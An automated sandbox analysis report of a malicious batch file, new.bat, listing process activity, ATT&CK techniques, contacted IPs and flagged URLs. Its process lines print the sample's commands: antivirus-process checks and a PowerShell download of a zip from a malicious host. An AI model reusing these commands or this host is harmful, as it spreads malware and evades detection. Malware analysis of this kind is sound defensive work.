Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 5413Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5053Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4771Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4616
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364Thread sleep count: 5053 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364Thread sleep count: 4771 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7248Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep count: 4616 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 5180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000013.00000002.3368989272.0000023869630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: svchost.exe, 0000000B.00000002.3382075262.000001D5E2A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3379890423.000001D5DD42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.2753024037.000001F95CE7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: find.exe, 00000008.00000002.2130232527.00000269259FB000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000008.00000002.2130287476.0000026925B20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory2
Process Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1554787 Sample: new.bat Startdate: 12/11/2024 Architecture: WINDOWS Score: 56 50 Antivirus detection for URL or domain 2->50 52 AI detected suspicious sample 2->52 8 cmd.exe 3 2 2->8         started        11 svchost.exe 1 1 2->11         started        process3 dnsIp4 54 Suspicious powershell command line found 8->54 14 powershell.exe 14 17 8->14         started        18 Acrobat.exe 79 8->18         started        20 conhost.exe 8->20         started        22 6 other processes 8->22 36 184.28.90.27 AKAMAI-ASUS United States 11->36 38 127.0.0.1 unknown unknown 11->38 signatures5 process6 dnsIp7 46 154.216.17.175 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 14->46 30 C:\Users\user\Downloads\downloaded.zip, Zip 14->30 dropped 48 23.192.223.236 AKAMAI-ASUS United States 18->48 24 AcroCEF.exe 106 18->24         started        file8 process9 dnsIp10 32 93.184.221.240 EDGECASTUS European Union 24->32 34 2.23.197.184 CWVodafoneGroupPLCEU European Union 24->34 27 AcroCEF.exe 2 24->27         started        process11 dnsIp12 40 96.7.168.138 INTERNEXABRASILOPERADORADETELECOMUNICACOESSABR United States 27->40 42 162.159.61.3 CLOUDFLARENETUS United States 27->42 44 2 other IPs or domains 27->44

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://kendychop.shop:8930/FTSP.zipmG100%Avira URL Cloudphishing
http://kendychop.shop:8930/cam.zip100%Avira URL Cloudmalware
http://kendychop.shop:8930/bab.zipz7100%Avira URL Cloudphishing
http://kendychop.shop:8930/startupppp.bat100%Avira URL Cloudphishing
http://kendychop.shop:8930100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zipC5100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zipY4100%Avira URL Cloudphishing
http://kendychop.shop:8930/FTSP.zipb7100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zip100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zipV100%Avira URL Cloudphishing
http://kendychop.shop:8930/FTSP.zip&100%Avira URL Cloudphishing
http://kendychop.shop:8930/FTSP.zip100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zip87dba6f100%Avira URL Cloudphishing
http://kendychop.shop:8930/FTSP.zipHOMEDRIVE=C:HOMEPATH=100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zip%100%Avira URL Cloudphishing
http://kendychop.shop:8930/bab.zip&100%Avira URL Cloudphishing
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2749316891.000001F954DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://kendychop.shop:8930/FTSP.zipmGpowershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: phishing
    unknown
    http://kendychop.shop:8930/startupppp.batnew.batfalse
    • Avira URL Cloud: phishing
    unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://go.microsoft.copowershell.exe, 00000013.00000002.3370047735.0000023869BBB000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://kendychop.shop:8930powershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800226000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://kendychop.shop:8930/bab.zipVpowershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          https://contoso.com/Licensepowershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/Iconpowershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000B.00000003.2168082474.000001D5E2910000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                high
                http://crl.ver)svchost.exe, 0000000B.00000002.3381905452.000001D5E2A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://kendychop.shop:8930/bab.zipz7powershell.exe, 00000009.00000002.2715117663.000001F942ABF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://kendychop.shop:8930/bab.zippowershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869B80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3367087321.0000023867670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmp, new.battrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://kendychop.shop:8930/bab.zipY4powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://kendychop.shop:8930/cam.zipnew.batfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://kendychop.shop:8930/FTSP.zipb7powershell.exe, 00000009.00000002.2715117663.000001F942ABF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://g.live.com/odclientsettings/Prod1C:edb.log.11.drfalse
                      high
                      http://kendychop.shop:8930/bab.zipC5powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://kendychop.shop:8930/FTSP.zip&powershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://kendychop.shop:8930/FTSP.zipHOMEDRIVE=C:HOMEPATH=powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3367553406.0000023868ED3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869C43000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      https://contoso.com/powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2749316891.000001F954DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://kendychop.shop:8930/bab.zip87dba6fpowershell.exe, 00000009.00000002.2753024037.000001F95CE30000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000009.00000002.2715733190.000001F944C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://kendychop.shop:8930/FTSP.zippowershell.exe, 00000013.00000002.3365123668.0000023867429000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmp, new.batfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.2715733190.000001F944C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://kendychop.shop:8930/bab.zip&powershell.exe, 00000013.00000002.3365123668.0000023867429000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              http://kendychop.shop:8930/bab.zip%powershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              23.192.223.236
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              162.159.61.3
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              2.23.197.184
                              unknownEuropean Union
                              1273CWVodafoneGroupPLCEUfalse
                              93.184.221.240
                              unknownEuropean Union
                              15133EDGECASTUSfalse
                              184.28.88.176
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              52.5.13.197
                              unknownUnited States
                              14618AMAZON-AESUSfalse
                              154.216.17.175
                              unknownSeychelles
                              135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                              184.28.90.27
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              96.7.168.138
                              unknownUnited States
                              262589INTERNEXABRASILOPERADORADETELECOMUNICACOESSABRfalse
                              IP
                              127.0.0.1
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1554787
                              Start date and time:2024-11-12 22:11:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:new.bat
                              Detection:MAL
                              Classification:mal56.winBAT@33/63@0/10
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 1
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .bat
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Execution Graph export aborted for target powershell.exe, PID 1404 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Skipping network analysis since amount of network traffic is too extensive
                              • VT rate limit hit for: new.bat
                              TimeTypeDescription
                              16:12:04API Interceptor81x Sleep call for process: powershell.exe modified
                              16:12:06API Interceptor2x Sleep call for process: svchost.exe modified
                              16:12:13API Interceptor2x Sleep call for process: AcroCEF.exe modified
                              16:13:26API Interceptor1697x Sleep call for process: conhost.exe modified
